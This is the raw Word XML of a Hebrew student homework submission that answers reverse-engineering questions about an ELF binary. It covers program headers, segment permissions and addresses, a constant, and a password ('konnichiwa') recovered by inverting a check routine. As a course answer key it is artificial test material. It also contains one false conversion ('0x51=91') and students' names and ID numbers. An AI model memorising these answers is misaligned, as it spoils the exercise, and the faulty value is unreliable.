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2505" w14:textId="7550C127" w:rsidR="00AA1203" w:rsidRPr="00BC2972" w:rsidRDefault="00AA1203" w:rsidP="00BC2972">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">תרגיל בית 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> חלק יבש</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C582B" w14:textId="45EE0E40" w:rsidR="00AA1203" w:rsidRPr="00BC2972" w:rsidRDefault="00AA1203" w:rsidP="00BC2972">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מגישים:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F230A" w14:textId="4C1DCB7E" w:rsidR="00AA1203" w:rsidRPr="00BC2972" w:rsidRDefault="00AA1203" w:rsidP="00BC2972">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t>תום גיא</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB9352" w14:textId="03FBD660" w:rsidR="00AA1203" w:rsidRPr="00BC2972" w:rsidRDefault="00AA1203" w:rsidP="00BC2972">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t>315155671</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BD6F8" w14:textId="47A0C11A" w:rsidR="00AA1203" w:rsidRDefault="00AA1203" w:rsidP="00BC2972">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2972">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:rtl/>
        </w:rPr>
        <w:t>זיו דמיר</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CE26D" w14:textId="4DF1EAD8" w:rsidR="00536C34" w:rsidRPr="00BC2972" w:rsidRDefault="00536C34" w:rsidP="00536C34">
      <w:pPr>
        <w:bidi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206606709</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDFD04" w14:textId="68133904" w:rsidR="00B62819" w:rsidRPr="004945A8" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
      <w:r w:rsidRPr="004945A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>חלק א'</w:t>
      </w:r>
      <w:r w:rsidR="004945A8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004945A8">
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00404FB5" w14:textId="6EB7C680" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>ישנם 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Program headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המוגדרים בקובץ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6AEB7" w14:textId="624B17F1" w:rsidR="00BC2972" w:rsidRDefault="00BC2972" w:rsidP="00BC2972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הטבלה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2972" w14:paraId="5A2F6DF2" w14:textId="77777777" w:rsidTr="00BC2972">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C9824A6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rPr>
                <w:rtl/>
              </w:rPr>
              <w:t>הרשאות</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03C2D3D8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rPr>
                <w:rtl/>
              </w:rPr>
              <w:t xml:space="preserve">גודל </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
              <w:t>בזכרון</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6445A948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rPr>
                <w:rtl/>
              </w:rPr>
              <w:t>גודל בקובץ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F7C289D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rPr>
                <w:rtl/>
              </w:rPr>
              <w:t xml:space="preserve">כתובת </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
              <w:t>בזכרון</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392EF9BC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 xml:space="preserve">Offset </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC2972" w14:paraId="4D6D637B" w14:textId="77777777" w:rsidTr="00BC2972">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6899D625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READ,EXECUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70B94598" w14:textId="6306A3B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1ee4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EAFD79A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1ee4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AEEDA55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400000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="083AA8E1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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC2972" w14:paraId="686C20AE" w14:textId="77777777" w:rsidTr="00BC2972">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="788E31CF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READ,WRITE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0219C106" w14:textId="4525B7F1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250</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="310EA92B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248</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1659" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A7CB3FD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602e10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D11A177" w14:textId="77777777" w:rsidR="00BC2972" w:rsidRDefault="00BC2972" w:rsidP="00BC2972">
            <w:pPr>
              <w:bidi/>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x2e10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F6B974" w14:textId="77777777" w:rsidR="006D5026" w:rsidRDefault="006D5026" w:rsidP="006D5026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ערך הבייט בכתובת </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0x40108d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בתחילת ריצת התוכנית הוא : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">0x51=91 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3570E7" w14:textId="535A4EF6" w:rsidR="006D5026" w:rsidRDefault="006D5026" w:rsidP="006D5026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unsigned long foo=0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">342383e382d4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F903D" w14:textId="5CA1AF4D" w:rsidR="006D5026" w:rsidRDefault="006D5026" w:rsidP="006D5026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
        <w:spacing w:line="256" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">להלן הקוד בשפת </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> :(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>שימו לב להערה בשורה 18) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D534215" w14:textId="0F75F5E0" w:rsidR="00CA687B" w:rsidRDefault="00A24B80" w:rsidP="00CA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:spacing w:line="256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75193" wp14:editId="42CA4C0C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>457200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>69850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4625340" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="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27D2B" w14:textId="5ADA9AEA" w:rsidR="00AA1203" w:rsidRDefault="00AA1203" w:rsidP="00AA1203">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4977E97D" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00AA1203">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350BE193" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E36C697" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72051BFD" w14:textId="43EBE590" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD2970F" w14:textId="7A93F976" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D612B0" w14:textId="4497B64A" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B39123F" w14:textId="277DBACD" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7421FE" w14:textId="0B48C6BF" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FD4D14" w14:textId="6D82BAE0" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B480F93" w14:textId="268A500C" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232DA771" w14:textId="297D4DAE" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4719C575" w14:textId="42B8EAA7" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0ED7A4" w14:textId="137399A7" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C38C53" w14:textId="2130AD09" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4377C71D" w14:textId="1A0BB915" w:rsidR="00CA687B" w:rsidRDefault="00CA687B" w:rsidP="00CA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">הסיסמא הינה </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>konnichiwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E7129" w14:textId="77777777" w:rsidR="00CA687B" w:rsidRDefault="00CA687B" w:rsidP="00CA687B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הסבר</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>:  היא מתקבלת</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ע"י ביצוע התהליך ההפוך שקורה ב </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> על </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">foo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ( נניח ע"י מציאת השארית בחלוקה מ26 של </w:t>
      </w:r>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>,החסרת הערך מ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">foo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">,הוספת התו </w:t>
      </w:r>
      <w:r>
        <w:t>‘a’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לשארית </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>החלוקה,הדפסת</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> התו המתקבל למסך ,ואז חלוקה של </w:t>
      </w:r>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב26 וכך הלאה עד שהערך של </w:t>
      </w:r>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">  הוא 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>, הסיסמא במקרה הזה תודפס בסדר הפוך.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE812A0" w14:textId="77777777" w:rsidR="00CA687B" w:rsidRDefault="00CA687B" w:rsidP="004945A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>להלן הפונקציה אותה מימשתי על מנת לבצע את התהליך ההפוך</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B04D7" w14:textId="76ECFF9E" w:rsidR="00CA687B" w:rsidRDefault="004945A8" w:rsidP="004945A8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173DDE" wp14:editId="0EA9F618">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>772160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4563110" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="889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9F08C" w14:textId="292DEE39" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6218BF7F" w14:textId="6A774D37" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDA2E43" w14:textId="362DC723" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153D5ADD" w14:textId="6DD39F42" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A91920C" w14:textId="6D9CC5ED" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326200B2" w14:textId="74C18035" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E605F66" w14:textId="1238A67F" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225812D5" w14:textId="77777777" w:rsidR="00B62819" w:rsidRDefault="00B62819" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6497237B" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="00B62819">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470E6515" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1319F323" w14:textId="762C66E5" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הצבת </w:t>
      </w:r>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בערך של הפונקציה תניב את התוצאה הבאה : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:val="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C92B441" wp14:editId="083F0EEE">
            <wp:extent cx="5730240" cy="3192780"/>
            <wp:effectExtent l="0" t="0" r="381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512A" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כאשר </w:t>
      </w:r>
      <w:r>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">  הוא המשתנה שמצאנו בסעיפים הקודמים.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18333FE9" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67098BF8" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147CD354" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8D9DB3" w14:textId="77777777" w:rsidR="004945A8" w:rsidRDefault="004945A8" w:rsidP="004945A8">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
